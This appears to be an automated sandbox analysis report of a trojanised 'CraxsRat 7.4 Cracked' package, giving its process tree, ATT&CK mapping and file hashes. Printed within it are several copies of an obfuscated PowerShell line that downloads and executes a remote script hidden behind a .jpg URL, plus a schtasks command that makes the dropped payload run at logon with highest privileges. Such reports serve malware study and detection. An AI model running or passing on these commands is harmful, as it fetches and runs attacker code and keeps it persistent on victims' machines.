- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Users\Admin\Desktop\._cache_CraxsRat.exe"C:\Users\Admin\Desktop\._cache_CraxsRat.exe" C:\Users\Admin\Desktop\ExtremeDumper.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3552 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3384 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd84⤵PID:3912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1948 /prefetch:24⤵PID:888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:3148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:84⤵PID:2328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:14⤵PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:14⤵PID:3432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,8371519719067122045,16074381862109184850,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:14⤵PID:852
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Users\Admin\Desktop\._cache_Synaptics.exe"C:\Users\Admin\Desktop\._cache_Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd85⤵PID:2500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1836,5452412383604207090,11410784074114183148,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:25⤵PID:4300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,5452412383604207090,11410784074114183148,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:4876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1836,5452412383604207090,11410784074114183148,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:85⤵PID:1716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,5452412383604207090,11410784074114183148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:15⤵PID:1672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,5452412383604207090,11410784074114183148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:15⤵PID:4652
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:764
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2532
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2552
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4308
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3692
-
C:\Users\Admin\Desktop\ExtremeDumper.exe"C:\Users\Admin\Desktop\ExtremeDumper.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4520 -
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe"2⤵
- Executes dropped EXE
PID:3052
-
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe"2⤵
- Executes dropped EXE
PID:2604
-
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\CraxsRat.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2276 -
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_CraxsRat.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_CraxsRat.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4852 -
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:236 -
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe"4⤵PID:2872
-
-
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"3⤵PID:3900
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe"4⤵PID:4688
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit5⤵PID:5192
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:6140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE351.tmp.bat""5⤵PID:5216
-
C:\Windows\SysWOW64\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:5744
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2yl.vbs"3⤵PID:1764
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $KXE='iex(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$JHXwe='*****#%^&@__#@!!@$^&(''https://raw.githubusercontent.com/DARK831/Top3/main/BarBarossa.jpg'')'.RePLACe('*****#%^&@__#@!!@$^&','ADSTRING');Sleep 1;($KXE+$kds+$JHXwe) | iex4⤵
- Command and Scripting Interpreter: PowerShell
PID:1080
-
-
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"3⤵PID:3612
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe"4⤵PID:3860
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"5⤵PID:1520
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe"6⤵PID:2028
-
-
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"5⤵PID:2392
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe"6⤵PID:336
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit7⤵PID:6128
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'8⤵
- Scheduled Task/Job: Scheduled Task
PID:1872
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2yl.vbs"5⤵PID:4508
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $KXE='iex(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$JHXwe='*****#%^&@__#@!!@$^&(''https://raw.githubusercontent.com/DARK831/Top3/main/BarBarossa.jpg'')'.RePLACe('*****#%^&@__#@!!@$^&','ADSTRING');Sleep 1;($KXE+$kds+$JHXwe) | iex6⤵
- Command and Scripting Interpreter: PowerShell
PID:3488
-
-
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"5⤵PID:1848
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe"6⤵PID:2532
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"7⤵PID:1448
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_2lz.exe"8⤵PID:4724
-
-
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"7⤵PID:4708
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_System.exe"8⤵PID:5464
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2yl.vbs"7⤵PID:2596
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $KXE='iex(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$JHXwe='*****#%^&@__#@!!@$^&(''https://raw.githubusercontent.com/DARK831/Top3/main/BarBarossa.jpg'')'.RePLACe('*****#%^&@__#@!!@$^&','ADSTRING');Sleep 1;($KXE+$kds+$JHXwe) | iex8⤵
- Command and Scripting Interpreter: PowerShell
PID:5204
-
-
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"7⤵PID:3716
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\._cache_bb2.exe"8⤵PID:5232
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe"9⤵PID:5524
-
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe"9⤵PID:5572
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2yl.vbs"9⤵PID:236
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $KXE='iex(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$JHXwe='*****#%^&@__#@!!@$^&(''https://raw.githubusercontent.com/DARK831/Top3/main/BarBarossa.jpg'')'.RePLACe('*****#%^&@__#@!!@$^&','ADSTRING');Sleep 1;($KXE+$kds+$JHXwe) | iex10⤵
- Command and Scripting Interpreter: PowerShell
PID:2944
-
-
-
C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\bb2.exe"9⤵PID:1652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools9⤵PID:3776
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd810⤵PID:1960
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools7⤵PID:5384
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd88⤵PID:5428
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools5⤵PID:2588
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd86⤵PID:1136
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/Private_Hacking_Cracking_Tools3⤵PID:700
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff7d913cb8,0x7fff7d913cc8,0x7fff7d913cd84⤵PID:1664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2016 /prefetch:24⤵PID:1840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:34⤵PID:1340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:84⤵PID:4304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:14⤵PID:1036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:14⤵PID:2160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:14⤵PID:4684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:14⤵PID:2044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:14⤵PID:808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:84⤵PID:5516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:14⤵PID:5596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,16379111078024822635,11397717045437155245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:14⤵PID:5752
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2344
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3440
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5c03d23a8155753f5a936bd7195e475bc
SHA1cdf47f410a3ec000e84be83a3216b54331679d63
SHA2566f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca
SHA5126ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41
-
Filesize
152B
MD53d68c7edc2a288ee58e6629398bb9f7c
SHA16c1909dea9321c55cae38b8f16bd9d67822e2e51
SHA256dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b
SHA5120eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f
-
Filesize
152B
MD553b27f582cb38d5ab3937585ac1a1b67
SHA19b9876f673fbe903ad258a02812664f27409edc4
